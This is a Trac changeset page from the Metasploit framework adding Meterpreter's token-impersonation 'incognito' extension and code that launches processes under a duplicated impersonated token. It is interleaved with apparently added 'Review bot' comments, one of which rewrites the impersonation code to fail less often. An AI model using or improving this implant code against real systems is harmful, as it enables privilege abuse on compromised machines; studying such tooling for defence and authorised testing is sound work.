Changeset 5499
- Timestamp:
- 04/28/08 11:57:49 (2 weeks ago)
- Files:
-
- framework3/trunk/data/meterpreter/ext_server_incognito.dll (added)
- framework3/trunk/data/meterpreter/ext_server_stdapi.dll (modified) (previous)
- framework3/trunk/data/msfweb/app/models/exploit.rb (modified) (1 diff)
- framework3/trunk/external/source/meterpreter/source/common/core.c (modified) (1 diff)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/hash_stealer.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/hash_stealer.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/incognito.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/incognito.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/list_tokens.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/list_tokens.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/token_info.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/token_info.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/user_management.c (added)
- framework3/trunk/external/source/meterpreter/source/extensions/incognito/user_management.h (added)
- framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c (modified) (3 diffs)
- framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c (modified) (2 diffs)
- framework3/trunk/external/source/meterpreter/source/extensions/stdapi/stdapi.h (modified) (1 diff)
- framework3/trunk/external/source/meterpreter/source/server/libloader.c (modified) (2 diffs)
- framework3/trunk/lib/rex/post/meterpreter/extensions/incognito (added)
- framework3/trunk/lib/rex/post/meterpreter/extensions/incognito/incognito.rb (added)
- framework3/trunk/lib/rex/post/meterpreter/extensions/incognito/tlv.rb (added)
- framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb (modified) (1 diff)
- framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb (modified) (1 diff)
- framework3/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb (added)
- framework3/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb (modified) (4 diffs)
framework3/trunk/data/msfweb/app/models/exploit.rb
r3980 r5499 2 2 def self.find_all() 3 3 mods = [] 4 $msframework.exploits.each_module { |n,m| mods << m.new}4 $msframework.exploits.each_module { |n,m| mods << $msframework.exploits.create(n) } 5 5 mods 6 6 end framework3/trunk/external/source/meterpreter/source/common/core.c
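Review bot: After the change the block parameter `m` in `each_module { |n,m| ... }` is no longer used, since the module is now instantiated through `$msframework.exploits.create(n)`; leaving it named as if it mattered invites a reader to assume `m.new` and `create(n)` are interchangeable. Renaming it to mark it unused, `each_module { |n, _| mods << $msframework.exploits.create(n) }`, makes the intent explicit.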
r4746 r5499 78 78 break; 79 79 80 memset(packet, 0, sizeof( Packet));80 memset(packet, 0, sizeof(packet)); 81 81 82 82 // Initialize the header length and message type framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
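Review bot: The new `memset(packet, 0, sizeof(packet));` zeroes only `sizeof` a pointer (4 or 8 bytes), not the `Packet` the old line cleared — `packet` is the memset destination, so it is a `Packet *` as the removed line implied, and every field past the first word keeps whatever the allocation left in it, including the header length and type that the next comment says are about to be set. Use `memset(packet, 0, sizeof(*packet));`, which follows the pointee type without repeating its name. The enclosing function starts and ends outside this section.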
r4603 r5499 11 11 Packet *response = packet_create_response(packet); 12 12 DWORD res = ERROR_SUCCESS; 13 CHAR username[512]; 14 DWORD size = sizeof(username); 13 CHAR username[512], username_only[512], domainname_only[512]; 14 LPVOID TokenUserInfo[4096]; 15 HANDLE token; 16 DWORD user_length = sizeof(username_only), domain_length = sizeof(domainname_only); 17 DWORD size = sizeof(username), sid_type = 0, returned_tokinfo_length; 15 18 16 19 memset(username, 0, sizeof(username)); 20 memset(username_only, 0, sizeof(username_only)); 21 memset(domainname_only, 0, sizeof(domainname_only)); 17 22 18 23 do 19 24 { 20 // Get the username 21 if (!GetUserName(username, &size)) 25 if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token)) 26 OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token); 27 28 if (!GetTokenInformation(token, TokenUser, TokenUserInfo, 4096, &returned_tokinfo_length)) 22 29 { 23 30 res = GetLastError(); 24 31 break; 25 32 } 33 34 if (!LookupAccountSidA(NULL, ((TOKEN_USER*)TokenUserInfo)->User.Sid, username_only, &user_length, domainname_only, &domain_length, (PSID_NAME_USE)&sid_type)) 35 { 36 res = GetLastError(); 37 break; 38 } 39 40 // Make full name in DOMAIN\USERNAME format 41 _snprintf(username, 512, "%s\\%s", domainname_only, username_only); 42 username[511] = '\0'; 26 43 27 44 packet_add_tlv_string(response, TLV_TYPE_USER_NAME, username); … … 86 103 osName = "Windows NT 4.0"; 87 104 } 88 else if (v.dwMajorVersion == 5)105 else 89 106 { 90 107 if (v.dwMinorVersion == 0) … … 94 111 else if (v.dwMinorVersion == 2) 95 112 osName = "Windows .NET Server"; 96 }97 else if (v.dwMajorVersion == 6)98 {99 if (v.dwMinorVersion == 0)100 osName = "Windows Vista";101 113 } 102 114 framework3/trunk/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c
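Review bot: The token opened at new lines 25–26 is never closed on any path visible here, and the `OpenProcessToken` fallback's return value is ignored, so when both calls fail `GetTokenInformation` is handed an uninitialized `token`. Check the fallback, `if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token) && !OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token)) { res = GetLastError(); break; }`, and add `CloseHandle(token);` once the SID lookup is done and on the two `break` paths that follow it; the function continues outside the section, so the close may also fit after the loop. `LPVOID TokenUserInfo[4096]` declares 4096 pointers while the length passed to `GetTokenInformation` is 4096 bytes; `BYTE TokenUserInfo[4096]` matches the length argument and reads as the byte buffer it is. Separately, the last hunk turns `else if (v.dwMajorVersion == 5)` into a bare `else` and deletes the `dwMajorVersion == 6` / Vista branch, so a 6.0 system now falls into the `dwMinorVersion == 0` entry of the 5.x table, which looks like a regression rather than an intended change.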
r2814 r5499 92 92 Tlv inMemoryData; 93 93 BOOL doInMemory = FALSE; 94 HANDLE token, pToken; 94 95 95 96 // Initialize the startup information … … 227 228 createFlags |= CREATE_SUSPENDED; 228 229 229 // Try to execute the process 230 if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, 231 createFlags, NULL, NULL, &si, &pi)) 232 { 233 result = GetLastError(); 234 break; 230 if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN) 231 { 232 // If there is a thread token use that, otherwise use current process token 233 if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token)) 234 OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token); 235 236 // Duplicate to make primary token (try delegation first) 237 if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken)) 238 if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken)) 239 { 240 result = GetLastError(); 241 break; 242 } 243 244 // Try to execute the process with duplicated token 245 if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, 246 createFlags, NULL, NULL, &si, &pi)) 247 { 248 result = GetLastError(); 249 break; 250 } 251 } 252 else 253 { 254 // Try to execute the process 255 if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, 256 createFlags, NULL, NULL, &si, &pi)) 257 { 258 result = GetLastError(); 259 break; 260 } 235 261 } 236 262 framework3/trunk/external/source/meterpreter/source/extensions/stdapi/stdapi.h
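Review bot: Neither `token` nor `pToken` is closed on any path in the new `PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN` branch, and the `OpenProcessToken` fallback on new line 234 is unchecked, so a double failure leaves `token` uninitialized when it reaches `DuplicateTokenEx`. The function starts and ends outside this section, so the cleanup belongs inside the branch: close `token` as soon as duplication has succeeded or failed, and close `pToken` after `CreateProcessAsUser` whether or not it succeeded. `TOKEN_ALL_ACCESS` is also more than `DuplicateTokenEx` needs — `TOKEN_DUPLICATE | TOKEN_QUERY` is sufficient for the open calls and fails less often on restricted tokens. The unbraced nested `if (!DuplicateTokenEx(...)) if (!DuplicateTokenEx(...)) {` reads more clearly as one `&&` condition.
```c
if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN)
{
    // If there is a thread token use that, otherwise use current process token
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_DUPLICATE | TOKEN_QUERY, TRUE, &token) &&
        !OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE | TOKEN_QUERY, &token))
    {
        result = GetLastError();
        break;
    }

    // Duplicate to make primary token (try delegation first)
    if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken) &&
        !DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
    {
        result = GetLastError();
        CloseHandle(token);
        break;
    }
    // The source token is no longer needed once the primary copy exists
    CloseHandle(token);

    // Try to execute the process with duplicated token
    if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit,
        createFlags, NULL, NULL, &si, &pi))
    {
        result = GetLastError();
        CloseHandle(pToken);
        break;
    }
    CloseHandle(pToken);
}
// … unchanged: else branch calling CreateProcess …
```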
r2815 r5499 67 67 #define PROCESS_EXECUTE_FLAG_CHANNELIZED (1 << 1) 68 68 #define PROCESS_EXECUTE_FLAG_SUSPENDED (1 << 2) 69 #define PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN (1 << 3) 69 70 70 71 #define TLV_TYPE_BASE_ADDRESS \ framework3/trunk/external/source/meterpreter/source/server/libloader.c
r4725 r5499 542 542 { 543 543 LPCSTR shortName = name, slash = NULL; 544 SHELLCODE_CTX *lctx;544 SHELLCODE_CTX lctx; 545 545 HMODULE mod = NULL; 546 547 lctx = (SHELLCODE_CTX *)VirtualAlloc(NULL, sizeof(SHELLCODE_CTX), MEM_COMMIT, PAGE_EXECUTE_READWRITE);548 549 if (!lctx)550 return NULL;551 546 552 547 if ((slash = strrchr(name, '\\'))) 553 548 shortName = slash+1; 554 549 555 memset( lctx, 0, sizeof(SHELLCODE_CTX));556 557 ctx = lctx;550 memset(&lctx, 0, sizeof(lctx)); 551 552 ctx = &lctx; 558 553 559 554 install_hooks(ctx); … … 579 574 remove_hooks(ctx); 580 575 581 VirtualFree(lctx, sizeof(SHELLCODE_CTX), MEM_RELEASE);582 583 576 ctx = NULL; 584 577 framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
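Review bot: Moving `lctx` from a `VirtualAlloc(..., PAGE_EXECUTE_READWRITE)` region onto the stack changes the memory's protection as well as its lifetime; the old allocation asked for executable memory, so if any part of `SHELLCODE_CTX` is executed in place, the stack copy will fault under DEP — worth confirming against the struct definition before relying on this. The file-scope `ctx` now holds the address of a stack variable between `ctx = &lctx;` and `ctx = NULL;`, and the code between them (`install_hooks` through `remove_hooks`) is mostly outside this section, so any early `return` in that stretch would leave `ctx` dangling; a comment at `ctx = &lctx;` such as `/* ctx points into this frame; it must be reset to NULL before every return */` records the constraint. The enclosing function starts and ends outside the section.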
r3242 r5499 128 128 if (opts['Suspended']) 129 129 flags |= PROCESS_EXECUTE_FLAG_SUSPENDED 130 end 131 if (opts['UseThreadToken']) 132 flags |= PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN 130 133 end 131 134 framework3/trunk/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
r3242 r5499 70 70 PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1) 71 71 PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2) 72 PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3) 72 73 73 74 # Registry framework3/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
r3804 r5499 28 28 "-i" => [ false, "Interact with the process after creating it." ], 29 29 "-m" => [ false, "Execute from memory." ], 30 "-d" => [ true, "The 'dummy' executable to launch when using -m." ]) 30 "-d" => [ true, "The 'dummy' executable to launch when using -m." ], 31 "-t" => [ false, "Execute process with currently impersonated thread token"]) 31 32 32 33 # … … 80 81 cmd_args = nil 81 82 cmd_exec = nil 83 use_thread_token = false 82 84 83 85 @@execute_opts.parse(args) { |opt, idx, val| … … 104 106 channelized = true 105 107 interact = true 108 when "-t" 109 use_thread_token = true 106 110 end 107 111 } … … 117 121 'Channelized' => channelized, 118 122 'Hidden' => hidden, 119 'InMemory' => (from_mem) ? dummy_exec : nil) 123 'InMemory' => (from_mem) ? dummy_exec : nil, 124 'UseThreadToken' => use_thread_token) 120 125 121 126 print_line("Process #{p.pid} created.")
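Review bot: The help text for the new `-t` option, `"Execute process with currently impersonated thread token"`, is the only one in the table without a trailing period and without a space before the closing bracket, so it renders inconsistently next to `-i`, `-m` and `-d`. `"-t" => [ false, "Execute process with the currently impersonated thread token." ])` matches the surrounding entries.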
